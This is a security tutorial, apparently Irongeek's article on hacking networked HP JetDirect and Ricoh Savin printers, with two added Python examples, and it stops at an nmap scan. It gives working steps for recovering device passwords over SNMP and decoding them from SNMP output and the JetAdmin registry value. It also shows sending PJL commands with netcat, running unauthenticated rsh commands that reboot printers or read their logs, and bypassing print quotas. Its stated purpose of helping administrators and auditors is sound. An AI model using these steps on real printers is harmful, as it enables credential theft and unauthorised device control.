Hacking Network Printers (Mostly HP JetDirects, but a little info on the Ricoh Savins)
By Adrian "Irongeek" Crenshaw
Hack a printer you say, what kind of toner have you been smoking, Irongeek? Well, I'm here to tell you, there's
more that can be done with a printer to compromise network security than one might realize. In the olden days a
printer may not have been much of a concern other than the threat from folks dumpster diving for hard copies of the
documents that were printed from it, but many modern printers come network aware with embedded Operating
Systems, storage and full IP stacks. This article will attempt to point out some of the more interesting things that can
be done with a network based printer to make it reveal information about its users, owners and the network it's part
of.
Some of this article may seem a little Black-hat as it concentrates more on the breaking-in than the keeping-out.
However I feel this information will be useful to system administrators and auditors so that they know what sorts of
things to look out for when it comes to network printers. If you want more advice on how to lock down your network
printer visit your vendor's web site. A guide from HP is linked at the bottom of this article for your convenience. If
nothing else, this article may get you thinking in the right direction.
For my tests I will mostly be using a Hewlett-Packard LaserJet 4100 MFP (Fax/Printer/Copier/Scanner), an HP
JetDirect 170x and a HP JetDirect 300X (J3263A) but I will also touch a bit on the Ricoh Savin series of printers lest
you think HPs are the only network printers with security problems.
Much of this article will read like a huge brain dump, sort of disorganized and hazy like my mind. It all started as
a project for Droop's Infonomicon TV and it snowballed from there with no specific direction. Bear with me as I clean
it up and other folks send me new additions and suggestions to make this article more useful.
The most recent version of this article can be found at: http://www.irongeek.com/i.php?page=security/networkprinterhacking
Table of Contents:
Intro to the concepts
Diagnostics page
Stupid Printer Tricks
JetDirect password notes
Getting a JetDirect password remotely using the SNMP vulnerability
Controlling the JetDirect box with telnet/web browser
RSH commands and Ricoh Savin Aficio Printers
Controlling and finding JetDirect boxes with JetAdmin
Finding Network printers using Nmap and SNMP tools
Finding info about the printer using SNMP tools
Finding Printers with Google
Using a JetDirect box as an Nmap Idlescan Zombie
Setting up a direct IP printer in Windows and Linux
Changing the LCD display text using HPhack, IGhphack or Hijetter
Phenoelit's Hijetter and PFT
Setting the LCD Display with Hijetter
Changing settings with Hijetter
Using Hijetter to treat some JetDirect boxes as files/web servers
Finding stored faxes and print jobs on Jetdirect printers
Using IP ACLs to restrict access
Don't forget to look for Stored Documents via the web interface
Coding your own scripts with PHP, Perl and PJL
Fixing a busted hard drive with Ghost
Sniffing print jobs and replaying them
A note on Plain-text authentication protocols
Other Ideas
Links to Tools
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
1 of 37 02/04/2009 08:17
Side note on a Pharos Uniprint vulnerability
Spamming Printers
DoSing the network or the printer
Media
Useful links for further research
Change Log
Intro to the concepts
There are several TLAs (Three Letter Acronyms) I will be using throughout this article so I had best get them out of
the way now. PCL stands for Printer Command Language, which was developed by HP and has become one of the most
common printer languages. Another page description language you should be aware of is PostScript (PS), which was
designed by Adobe and is a full programming language for describing pages, so it can drive more complicated output on
a plotter/printer. PJL (Printer Job Language), also from HP, sits above PCL and PostScript and carries job-level
commands: it can tell a printer what to do, from switching languages and changing device settings to reading status
and, on some models, transferring files. There are also three major network printing protocols you should be aware of.
Here's a table with some of the pertinent information about each protocol:
Name                                                    Meaning                        Port
LPD (aka Berkeley printing system)                      Line Printer Daemon protocol   515/tcp
IPP                                                     Internet Printing Protocol     631/tcp
JetDirect (aka AppSocket, aka Raw, aka PDL-datastream)  raw page description data      9100/tcp
Since my focus is on JetDirects I will mostly be talking about and using AppSocket/PDL-datastream, but since
many JetDirects can also work with IPP and LPD, and many non-HP network printers also use AppSocket, you
should be aware of the existence of all three. There are also network printers that use the IPX, AppleTalk and SMB
(some Savins for example) protocols to communicate. I'll not cover IPX and AppleTalk because of my lack of
experience with them; maybe someone else who reads this page will submit some info on them for me to post (credit
will be given). SMB I may try to cover at a later time. Now that the formalities are out of the way, let's start playing
with printers.
Diagnostics page
The pictures above are of an external JetDirect 170x box. Notice the picture on the right; on its far right-hand side
you will see a little button labeled "test". Pressing this button on most JetDirect boxes will print out a diagnostic
page listing statistics and the IP settings for the JetDirect box. If your printer has an internal JetDirect card you
will have to navigate the menus to find out how to print this diagnostics page. Once you hit the test button the
printer should print out a page or two that lists information like host name, MAC address, IP address, subnet mask,
default gateway, firmware revision and some general statistics. The IP/host name will be especially useful if you
want to bypass print quota software by setting up direct IP printing on your Windows or Linux box. If you don't have
physical access to the JetDirect box you can still find its IP or host name by seeing what its port is listed as, if
that network printer has been set up on a Windows box you have access to.
As you can see by the graphic on the left, the host name for this JetDirect box is npib1002c. Sometimes you will
see a port listed as something like IP_192.168.1.102, where obviously 192.168.1.102 is the JetDirect's IP. You can
pretty much use a host name or an IP interchangeably on your LAN, and if the host name has a fully qualified domain
name that resolves publicly (and nothing filters the traffic) you should be able to address it from the Internet as
well.
If you don't have access to a JetDirect box, or if your PC is not connected to one, don't despair. In the next few
sections I will describe how to find these printers on the LAN/Internet using Nmap and JetAdmin.
Stupid Printer Tricks
I called this section Stupid Printer Tricks because while these activities aren't very technical, they do illustrate the
simplicity of the Raw/AppSocket protocol that listens on port 9100/tcp on JetDirects and most other network printers.
Try this: find your printer's IP using the Diagnostics page then web surf to:
http://your-printers-ip:9100
The ":9100" at the end is there to tell your browser to connect on port 9100/tcp. When you try to establish the
connection you should notice that the browser does not go anywhere; this is because what's running on port 9100/tcp
is not a web server. Click the stop button on your browser to tell it to stop trying to connect, then go take a look at
the printer. Depending on what browser you use you should see a print out something like one of the following:
Firefox:

GET / HTTP/1.1
Host: tux:9100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

Internet Exploiter:

GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: test:9100
Connection: Keep-Alive
You see, anything that the printer sees coming in on port 9100/tcp it tries to treat as a print job. The two texts
you see above are HTTP GET requests for the root document of the server. The network printer does not understand
this and just prints the request out as text. Another thing you can try is telnetting to port 9100 (we will assume
your printer's IP is 192.168.1.2), typing in some text, and seeing it print:
Irongeek:~# telnet 192.168.1.2 9100
Trying 192.168.1.2...
Connected to 192.168.1.2.
Escape character is '^]'.
hello printer
^]
telnet> quit
Connection closed.
Irongeek:~#
You should now see a print out that just has the words "hello printer" on it. The "^]" represents pressing the
Control key and the ] bracket at the same time. The above example was done in *nix, but the same commands
should work in Windows. Keep in mind you may not see all of what you type in unless you have local echo turned
on (which seems to be off by default in Windows).
There are exceptions to network printers just printing out everything sent to port 9100. This trick, for which
more details are given later, should change the LCD display to say what you want. It's not supported on all
printers, but if you have an HP it should work. I've got to thank Dipswitch for pointing out that you don't need fancy
tools or code to do it (but the tools do make it easier).
With Telnet:
Irongeek:~# telnet 192.168.1.2 9100
@PJL RDYMSG DISPLAY="Some Text"
^]
telnet> quit
Irongeek:~#
Or Netcat:
Irongeek:~# echo @PJL RDYMSG DISPLAY=\"Some Text\" | netcat -q 0 192.168.1.2 9100
Irongeek:~#
JetDirect password notes
Most of the time folks never even turn the JetDirect's password options on, but if they do they quickly find that
they don't always work in logical ways.
If you are using a newer JetDirect box like one of the following:
680N (J6058A)
615N (J6057A)
610N (J4169A, J4167A)
380X (J6061A)
310X (J6038A)
250M (J6042A)
175X (J6035A)
or an HP printer with an internal JetDirect card like:
HP LaserJet 4100 series
HP LaserJet 8150 series
HP LaserJet 9000 series
HP Color LaserJet 4550 series
HP Color LaserJet 4600
HP Designjet 5000 series or HP Business Inkjet 2600
then the telnet and device password used by the Web interface and JetAdmin software are the same. If you telnet in
you will be prompted for a user name and password. The user names "root", "admin", "administrator" and
"supervisor" are all valid and equivalent.
If you are using an older JetDirect box like one of the following:
600N (J3110A, J3111A, J3112A, J3113A)
400N (J4100A, J4105A, J4106A)
300X, 500X, 170X (J3296A, J4101B, J3263A, J3264A, J3265A, J4102B, J3258B)
then things are more confusing. First, if you telnet in you will only be prompted for a password; no user name is asked
for. If you set up a password for the telnet service it may not be the same password as for the web interface, and vice
versa. In other words there are two passwords on at least some JetDirect boxes, one for telnetting into it and one for
the web interface/JetAdmin software. Telnet passwords are case sensitive but Web/JetAdmin passwords are not.
Telnet passwords are limited to 16 characters, Web/JetAdmin passwords to 12. Just so you know, Hijetter (discussed
later) may report the password as disabled even if both passwords are set, but that's OK since it bypasses passwords
anyway.
The Web interface and JetAdmin use SNMP (Simple Network Management Protocol) to control the JetDirect
boxes and require that you know the password, but I've read that other third party SNMP configuration utilities will
just ignore the password altogether and can connect and control the JetDirect anyway. It might be a good idea for
some to change their SNMP community names to something other than the default public/private, but even if they do
they could still be sniffed off of the wire unless they have a more recent JetDirect that supports SNMPv3 and
SSL/TLS.
If you use the JetAdmin for Windows 2000 desktop software be aware that it automatically stores passwords in
the registry once you use it. For example, if the MAC address of a JetDirect box was 001083A2C913 then JetAdmin
would store the password "password" in User\Software\Hewlett-Packard\HP JetAdmin\DeviceOptions
\001083A2C913 in a value called "Access" as "50 00 41 00 53 00 53 00 57 00 4f 00 52 00 44,00,00,00". In case you
don't notice it, this hex string is the password "password" converted to all uppercase, with each letter turned into its
hex equivalent, with a null character between each password character (in other words, UTF-16LE), and then null
padded. Anyone who can read that user's registry hive can read the printer password.
Brute forcing these passwords might be an option since logging on many network printers isn't all that involved.
As you already know telnet is unencrypted so sniffing those passwords is trivial. As I found by sniffing with Ethereal,
the web interface on older Jetdirects (really a Java applet) and JetAdmin use SNMP to configure the JetDirect box
and also pass their password as plain text. Look for the password just before the string "=108" in the dumps. Some
newer Jetdirects don't do this, and can use SSL to encrypt the connection.
If you set a password on a JetDirect box while you are playing around with it and forget what it is, all you have
to do is a hard reset. Unplug the power cord, hold down the test/status button, and while still holding the button plug
the power back in. The password and all of the other settings should now be cleared.
Getting a JetDirect password remotely using the SNMP vulnerability
I was cruising around SecurityFocus.com looking for JetDirect exploits and I came across a doozy:
http://www.securityfocus.com/bid/7001/exploit
Since the link above is rather shy on details I'll show you the exploit step by step. It seems that the device
password for many JetDirects is stored in almost plain text and is accessible via SNMP using the read community
name. Most folks leave their SNMP community name as "public", but even if it has been changed it's likely sniffable.
Also try "internal" as the community name as this is the default write community name on many JetDirects. Reports
are that on some JetDirects, even if you change the community name, "internal" will still work. With the Net-SNMP
toolset the password is easy to recover:
Irongeek:~# snmpget -v 1 -c public 192.168.2.46 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
SNMPv2-SMI::enterprises.11.2.3.9.1.1.13.0 = Hex-STRING: 50 41 53 53 57 4F 52 44 3D 31 30 38 3B 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Irongeek:~#
Notice the hex string. In hex 50=P, 41=A, 53=S, 53=S, 57=W, 4F=O, 52=R, 44=D, 3D="=", 31=1, 30=0, 38=8, 3B=";".
In other words, "PASSWORD=108;", which means the password is "PASSWORD". I also tried it after changing the
password to newpassword, and likewise "4E 45 57 50 41 53 53 57 4F 52 44 3D 31 30 38 3B" is "NEWPASSWORD=108;".
Anything before the "=108;" is the password. For those too lazy to do the hex to ASCII conversion themselves
check out:
http://nickciske.com/tools/hex.php
Also note that I entered my passwords in lowercase, but they were stored in uppercase. These passwords are case
insensitive, which also shrinks the space a brute-force attempt has to cover. Some of the vulnerable JetDirects are:
HP JetDirect J3263A
HP JetDirect J3113A
HP JetDirect J3111A
Other JetDirects may also be vulnerable, so it's worth testing. I tried it with my Hewlett Packard HP JetDirect 300X
(J3263A) and installing the latest firmware (H.08.49) seems to fix this problem, but I imagine there are still a lot of
un-patched JetDirects out there. Some print servers like the HP J3258A JetDirect 170X do not have user-upgradeable
firmware at all, so you are stuck with the firmware they were shipped with. The only way to fix the vulnerability on
them is to buy a new JetDirect.
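Both of the leaks above (the SNMP Hex-STRING from this section and the JetAdmin "Access" registry value from the password notes) are just encodings, so they are worth decoding with a script rather than a web form. The following is an added example, not code from the original article; the function names are this example's own, and the sample inputs are the byte strings quoted on this page.

```python
"""Decode the two leaked-password formats described in the JetDirect sections.

Added example, not code from the original article.  It handles the Hex-STRING
that snmpget prints for .1.3.6.1.4.1.11.2.3.9.1.1.13.0 ("<PASSWORD>=108;" plus
NUL padding) and the "Access" value HP JetAdmin leaves in the registry (the
password upper-cased and stored as UTF-16LE with NUL padding).
"""
import re
from typing import Optional

# Constructed from the snmpget output above: 13 meaningful bytes, then NUL padding.
SAMPLE_SNMPGET_LINE = (
    "SNMPv2-SMI::enterprises.11.2.3.9.1.1.13.0 = Hex-STRING: "
    "50 41 53 53 57 4F 52 44 3D 31 30 38 3B 00 00 00" + " 00" * 240
)
# The JetAdmin registry value quoted in the password notes section.
SAMPLE_JETADMIN_ACCESS = "50 00 41 00 53 00 53 00 57 00 4f 00 52 00 44,00,00,00"


def hex_field(snmpget_line: str) -> str:
    """Pull the hex bytes out of a net-snmp 'Hex-STRING:' result line."""
    _, _, hexpart = snmpget_line.partition("Hex-STRING:")
    if not hexpart:
        raise ValueError("not a Hex-STRING result")
    return hexpart.strip()


def _hex_to_bytes(text: str) -> bytes:
    """Accept hex separated by spaces, commas or nothing (PDF-flattened dumps)."""
    return bytes.fromhex("".join(re.findall(r"[0-9A-Fa-f]{2}", text)))


def decode_snmp_password(hex_string: str) -> Optional[str]:
    """Recover the device password from the hex bytes of the password OID.

    Returns None when the "=108;" marker is missing, which is what you get on
    firmware that no longer exposes the value or when the OID is not set.
    """
    text = _hex_to_bytes(hex_string).rstrip(b"\x00").decode("ascii", errors="replace")
    match = re.fullmatch(r"(.*)=108;", text, flags=re.DOTALL)
    return match.group(1) if match else None


def decode_jetadmin_access(value: str) -> str:
    """Decode JetAdmin's 'Access' registry value: UTF-16LE text, NUL padded."""
    return _hex_to_bytes(value).decode("utf-16-le").rstrip("\x00")


if __name__ == "__main__":
    print("SNMP leak     :", decode_snmp_password(hex_field(SAMPLE_SNMPGET_LINE)))
    print("JetAdmin leak :", decode_jetadmin_access(SAMPLE_JETADMIN_ACCESS))
```

Feed `hex_field()` the line snmpget prints and `decode_snmp_password()` gives you the password or None; the NEWPASSWORD case from the text decodes the same way. Because the stored form is upper-cased, whatever you recover is also the set of case variants a login will accept.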
Controlling the JetDirect box with telnet/web browser
Most JetDirect boxes can be configured with a web browser or via a telnet session. Below you will see a screenshot
of the web-based configuration tool. Just type the IP or host name of the JetDirect box into the address bar of
your favorite Java-enabled web browser and it should work.
Here is an example of connecting to a JetDirect box with a telnet session, bringing up the help screen and
resetting the host name:
Irongeek:~# telnet 192.168.1.2
Trying 192.168.1.2...
Connected to 192.168.1.2.
Escape character is '^]'.

HP JetDirect

Please type "?" for HELP, or "/" for current settings
> ?

To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>

Parameter-name  Type of value
ip:             IP-address in dotted notation
subnet-mask:    address in dotted notation (enter 0 for default)
default-gw:     address in dotted notation (enter 0 for default)
syslog-svr:     address in dotted notation (enter 0 for default)
idle-timeout:   seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name:      alpha-numeric string (upper case only, 32 chars max)
dhcp-config:    0 to disable, 1 to enable
allow:          <ip> [mask] (0 to clear, list to display, 10 max)

addrawport:     <TCP port num> (<TCP port num> 3000-9000)
deleterawport:  <TCP port num>
listrawport:    (No parameter required)

addstring:      <name> <contents>
                contents - For non-printable characters use \xx for two digit hex number
deletestring:   <name>
liststring:     (No parameter required)
addq:           <name> [prepend] [append] [processing]
                prepend - The prepend string name
                append - The append string name
                Use NULL for no string
                processing - RAW, TEXT, or AUTO
deleteq:        <name>
listq:          (No parameter required)
defaultq:       <name>

ipx/spx:        0 to disable, 1 to enable
dlc/llc:        0 to disable, 1 to enable
ethertalk:      0 to disable, 1 to enable
banner:         0 to disable, 1 to enable

Type passwd to change the password.

Type "?" for HELP, "/" for current settings or "quit" to save-and-exit.
Or type "exit" to exit without saving configuration parameter entries
> /

===JetDirect Telnet Configuration===
Firmware Rev.   : H.08.32
MAC Address     : 00:60:b0:6d:47:c6
Config By       : DHCP

IP Address      : 192.168.1.2
Subnet Mask     : 255.255.255.0
Default Gateway : 192.168.1.1
Syslog Server   : Not Specified
Idle Timeout    : 90 Seconds
Set Cmnty Name  : Not Specified
Host Name       : NPI6D47C6

DHCP Config     : Enabled
Passwd          : Disabled
IPX/SPX         : Enabled
DLC/LLC         : Enabled
Ethertalk       : Enabled
Banner page     : Enabled
> host-name:BUTTMONKEY
> /

===JetDirect Telnet Configuration===
Firmware Rev.   : H.08.32
MAC Address     : 00:60:b0:6d:47:c6
Config By       : DHCP

IP Address      : 192.168.1.2
Subnet Mask     : 255.255.255.0
Default Gateway : 192.168.1.1
Syslog Server   : Not Specified
Idle Timeout    : 90 Seconds
Set Cmnty Name  : Not Specified
Host Name       : BUTTMONKEY

DHCP Config     : Enabled
Passwd          : Disabled
IPX/SPX         : Enabled
DLC/LLC         : Enabled
Ethertalk       : Enabled
Banner page     : Enabled
> quit

===JetDirect Parameters Configured===
IP Address      : 192.168.1.2
Subnet Mask     : 255.255.255.0
Default Gateway : 192.168.1.1
Syslog Server   : Not Specified
Idle Timeout    : 90 Seconds
Set Cmnty Name  : Not Specified
Host Name       : BUTTMONKEY

DHCP Config     : Enabled
Passwd          : Disabled
IPX/SPX         : Enabled
DLC/LLC         : Enabled
Ethertalk       : Enabled
Banner page     : Enabled
User Quitting
Connection closed by foreign host.
Irongeek:~#
Important note about using telnet to configure a JetDirect box: You must use the "quit" command to end
your session if you want your changes to be saved. If you just kill the telnet terminal all of the changes you made
during the session will be lost.
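The "/" dump above is also the quickest audit you can do on a JetDirect, and the quit-to-save rule is easy to get wrong when scripting changes. The following is an added example, not code from the original article: it parses the dump shown above, flags the settings the surrounding text warns about (no telnet password, default SNMP community, no syslog, legacy protocols left on) and builds a telnet session that ends with "quit" so the changes stick. The "hardened" dump and the judgement of what counts as weak are this example's own.

```python
"""Audit the settings a JetDirect prints for "/" over telnet, and build a
change session that actually saves.

Added example, not code from the original article.  SAMPLE_DUMP is the
capture shown above; HARDENED_DUMP is constructed for contrast.
"""
from typing import Dict, List, Tuple

SAMPLE_DUMP = """\
===JetDirect Telnet Configuration===
Firmware Rev.   : H.08.32
MAC Address     : 00:60:b0:6d:47:c6
Config By       : DHCP

IP Address      : 192.168.1.2
Subnet Mask     : 255.255.255.0
Default Gateway : 192.168.1.1
Syslog Server   : Not Specified
Idle Timeout    : 90 Seconds
Set Cmnty Name  : Not Specified
Host Name       : NPI6D47C6

DHCP Config     : Enabled
Passwd          : Disabled
IPX/SPX         : Enabled
DLC/LLC         : Enabled
Ethertalk       : Enabled
Banner page     : Enabled
"""

# Constructed, not captured: the same box after locking it down.
HARDENED_DUMP = """\
===JetDirect Telnet Configuration===
Firmware Rev.   : H.08.49
IP Address      : 192.168.1.2
Syslog Server   : 192.168.1.50
Set Cmnty Name  : Specified
Host Name       : PRN01
Passwd          : Enabled
IPX/SPX         : Disabled
DLC/LLC         : Disabled
Ethertalk       : Disabled
"""


def parse_settings(dump: str) -> Dict[str, str]:
    """Turn 'Key : Value' lines into a dict.  Splitting on the first colon
    keeps the MAC address (which contains colons) intact."""
    settings: Dict[str, str] = {}
    for line in dump.splitlines():
        if line.startswith("===") or ":" not in line:
            continue
        key, _, value = line.partition(":")
        settings[key.strip()] = value.strip()
    return settings


def audit(settings: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (setting, problem) pairs for the weak spots the article describes."""
    findings: List[Tuple[str, str]] = []
    if settings.get("Passwd") != "Enabled":
        findings.append(("Passwd", "no telnet password: anyone reaching 23/tcp can reconfigure the box"))
    if settings.get("Set Cmnty Name", "Not Specified") == "Not Specified":
        findings.append(("Set Cmnty Name", "SNMP set community left at the default"))
    if settings.get("Syslog Server", "Not Specified") == "Not Specified":
        findings.append(("Syslog Server", "no remote syslog: configuration changes leave no off-box record"))
    for proto in ("IPX/SPX", "DLC/LLC", "Ethertalk"):
        if settings.get(proto) == "Enabled":
            findings.append((proto, "unneeded protocol enabled: extra ways onto the box"))
    return findings


def build_session(changes: Dict[str, str]) -> str:
    """Text to feed the telnet prompt.  It ends with 'quit' because that is
    what commits the changes; 'exit' or a dropped connection discards them."""
    lines = [f"{name}: {value}" for name, value in changes.items()]
    lines.append("/")      # echo the settings back so the transcript shows the result
    lines.append("quit")   # save-and-exit
    return "\r\n".join(lines) + "\r\n"


if __name__ == "__main__":
    for name, problem in audit(parse_settings(SAMPLE_DUMP)):
        print(f"{name:15} {problem}")
    print(build_session({"host-name": "PRN01", "syslog-svr": "192.168.1.50"}))
```

Run against the dump from this page, `audit()` flags six problems; against the hardened dump it returns nothing. The `allow:` parameter (IP ACL) is the other setting you would script in, and it is covered in its own section later.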
RSH commands and Ricoh Savin Aficio Printers
I've got to thank Mslaviero for introducing me to this aspect of Ricoh Savin printers. Check out his site:
http://www.cs.up.ac.za/cs/mslaviero/archives/2005/04/28/ricoh-afficio-2035-security-or-lack-thereof/
Normally you might want to log in to your Savin with telnet, but it's likely password protected (the default
password is "password" on some Savins). Don't fear, there is another way you may be able to execute some
commands on the printer. You may have noticed from an Nmap scan that your Ricoh Savin has port 514/tcp open.
Guess what? You can use the rsh *nix utility to execute commands remotely on the box. First you will want to make
sure you have the rsh client installed. Rsh has largely been deprecated because of its unencrypted connections and
other security problems. If you try rsh on your Linux box it will likely try to use SSH automatically instead, which
won't work. If you have a Debian-based distribution install rsh-client (apt-get install rsh-client) and try out some of
these commands to gather more information from your Savin printer:
The info command will list the printer's current configuration and supported options:
root@Irongeek:~# rsh 192.168.1.2 info
(Input Tray)
No. Name         Page Size     Status
-------------------------------------------------------------------------------
1   Tray 1       11 x 8 1/2"   PaperEnd.
2   Tray 2       11 x 8 1/2"   Normal.
3   LCT          11 x 8 1/2"   Normal.
4   Bypass Tray  11 x 8 1/2"   PaperEnd.

(Output Tray)
No. Name                  Status
------------------------------------------------------------------------
1   Internal Tray 1       Normal.
2   Finisher Upper Tray   Normal.
3   Finisher Shift Tray   Normal.

(Printer Language)
No. Name                           Version
--------------------------------------------------------
1   Automatic Language Switching   2.21.5.3
2   Customized PJL                 2.21.5.3
3   RPCS                           2c.9.5a
4   PCL 5e Emulation               1.01
5   PCL XL Emulation               1.01
6   Adobe PostScript 3             1.02
Stat gives you the printer status and the job queue (duh):
root@Irongeek:~# rsh 192.168.1.2 stat
Printer status  : Printing.(Ready.)
Online/Offline  : Online.

Rank    Owner      Job    Files             Total Size
active  anonymous  2491   (standard input)  126980 bytes
The syslog command will return information such as the firmware version, the WINS server on the network, what
daemons were started and other bits of info. Notice that the rshd lines at the bottom also record the source IP of rsh
clients and the commands they tried, so your own poking leaves a trace here:
root@Irongeek:~# rsh 192.168.1.2 syslog
#[ncsd(17)]06/02/24 07:16:18 RICOH Aficio 2045e 2.40 INFO:
#[ncsd(17)]06/02/24 07:16:18 Network Control Service 4.12 INFO:
#[ncsd(17)]06/02/24 07:16:18 Copyright (C) 1994-2002 RICOH CO.,LTD. INFO:
#[ncsd(17)]06/02/24 07:16:19 Ethernet started with IP: 192.168.1.2 INFO:
#[inetd(42)]06/02/24 07:16:19 inetd start. INFO:
#[snmpd(43)]06/02/24 07:16:19 Snmpd Start. INFO:
#[httpd(44)]06/02/24 07:16:19 httpd start. INFO:
#[ncsd(17)]06/02/24 07:16:19 Current Interface Speed : 100Mbps(full-duplex) INFO:
#[nbtd(45)]06/02/24 07:16:19 nbtd start. INFO:
#[nbtd(45)]06/02/24 07:16:19 Name registration success. WINS Server=192.168.30.100 NetBIOS Name=RNP82398B (Ethernet) INFO:
#[nbtd(45)]06/02/24 07:16:19 Name registration success. WINS Server=192.168.30.100 NetBIOS Name=IGPrinter (Ethernet) INFO:
#[nbtd(45)]06/02/24 07:16:19 Name registration success. WINS Server=192.168.30.100 NetBIOS Name=WORKGROUP (Ethernet) INFO:
#[multid(48)]06/02/24 07:16:21 multid start. INFO:
#[diprintd(51)]06/02/24 07:16:21 started. INFO:
#[lpd(52)]06/02/24 07:16:21 restarted INFO:
#[snmpd(43)]06/02/24 07:16:28 Snmp over ip is ready. INFO:
#[httpd(44)]06/02/24 07:16:28 ipp enable. INFO:
#[httpd(44)]06/02/24 07:16:28 nrs disable. INFO:
#[lpd(52)]06/03/06 22:19:28 bad request (71) from WARNING:
#[lpd(52)]06/03/06 22:19:28 Illegal service request ERR:
#[lpd(52)]06/03/06 22:19:28 Lost connection ERR:
#[rshd(2570)]06/03/06 22:19:33 192.168.19.56 can't connect second port: 65360 INFO:
#[rshd(2596)]06/03/06 22:50:32 (192.168.19.56) help: Command not supported. ERR:
Prnlog gives you more information on recently printed documents:
root@Irongeek:~# rsh 192.168.1.2 prnlog
ID    User  Page  Result    Time
--------------------------------------------------------
2472        2     Finished  06/03/06 21:29
2473        10    Finished  06/03/06 21:33
2474        1     Finished  06/03/06 21:58
2475        19    Finished  06/03/06 21:59
2476        3     Finished  06/03/06 22:16
2477        4     Finished  06/03/06 22:16
2478        2     Finished  06/03/06 22:17
2479        4     Finished  06/03/06 22:19
2480        5     Finished  06/03/06 22:22
2481        3     Finished  06/03/06 22:24
2482        2     Finished  06/03/06 22:29
2483        2     Finished  06/03/06 22:35
2484        1     Finished  06/03/06 22:37
2485        2     Finished  06/03/06 22:38
2486        2     Finished  06/03/06 22:38
2487        2     Finished  06/03/06 22:40
2488        6     Finished  06/03/06 22:40
2489        2     Finished  06/03/06 22:45
2490        4     Finished  06/03/06 22:52
2491        30    Finished  06/03/06 22:53
Ps will list the currently running processes:
root@Irongeek:~# rsh 192.168.1.2 ps
pid=2605 [rshd]
pid= 57 [pcl]
pid= 55 [rsp]
pid= 52 [lpd]
pid= 51 [diprintd]
pid= 49 [centrod]
pid= 48 [multid]
pid= 47 [gps-web]
pid= 46 [gps-pm]
pid= 45 [nbtd]
pid= 44 [httpd]
pid= 43 [snmpd]
pid= 42 [inetd]
pid= 41 [mcsc]
pid= 40 [meu]
pid= 38 [plotter_sa]
pid= 36 [shmlog]
pid= 35 [copy]
pid= 34 [gps]
pid= 33 [scan]
pid= 32 [nfa]
pid= 31 [wdb]
pid= 30 [pts]
pid= 29 [websys]
pid= 23 [nrs]
pid= 21 [dcs]
pid= 19 [ous]
pid= 18 [ucs]
pid= 17 [ncsd]
pid= 16 [ecs]
pid= 15 [mcs]
pid= 14 [fcuh]
pid= 13 [scs]
pid= 12 [imh]
pid= 3 [checker]
pid= 2 [pagedaemon]
pid= 1 [init]
pid= 0 [swapper]
The print command prints whatever you feed it on standard input onto a sheet of paper (in this case just the word "test"):
root@Irongeek:~# rsh 192.168.1.2 print
test
root@Irongeek:~#
Also try "rsh ip-address reboot" to see if you can reset the printer remotely (check syslog to see if it worked).
Much the same information can be obtained by downloading files from the Savin printer's built-in FTP server and
reading them in a text editor. See the screenshot below:
Controlling and finding JetDirect boxes with JetAdmin
A nice tool Hewlett-Packard puts out for controlling JetDirect boxes is JetAdmin. Currently HP only offers a
web version of the software, called appropriately enough Web JetAdmin, with versions for both Windows and Linux.
Unfortunately you have to register on HP's site to get it, but you can download it without registering from this mirror
site:
http://www.svrops.com/svrops/dwnldprog.htm
Personally I prefer the older HP JetAdmin for Windows 2000 (v3.42, the last version to be released before it was
discontinued, but it still works fine with XP) as it seems quicker and less bloated; however it may be missing some of
the features of the newer Web JetAdmin. You can download the desktop version from:
http://www.helpdesk.umd.edu/os/windows_nt/printing/674/
JetAdmin is very fast at finding JetDirect boxes on your subnet since it does an SNMP broadcast to the network to
locate them. Just right click and choose "Properties" to find more information about the JetDirect box, or choose
"Modify" to bring up a wizard that lets you change the description, IP settings and other variables associated with
the printer. JetAdmin can also generate reports about the network printers it finds. JetAdmin can do too many things
for me to describe them all in detail here, so go download it and try it out.
As a side note, if you want to find boxes on a network running Web JetAdmin, do a port scan for 8000/tcp (HTTP)
and 8443/tcp (HTTPS); if its password is weak or non-existent it's an easy way to control a network's printers. If
you are interested in a JetAdmin-like tool for the Ricoh Savin printers look into SmartDeviceMonitor.
Finding Network printers using Nmap and SNMP tools
Using Nmap from your Linux (preferable) or Windows box makes finding JetDirects and other network printers
pretty easy. The Nmap commands I will be showing in this section are very simple and not very stealthy, so you may
want to consult the Nmap man page or a good Nmap tutorial for more ideas. You could use a simple Nmap
command like:
nmap -A 192.168.1.*
to scan the range 192.168.1.0-255 for common ports and do an OS and version detect on the systems it finds. The
output of the above command would look something like the following:
Irongeek:~# nmap -A 192.168.1.*

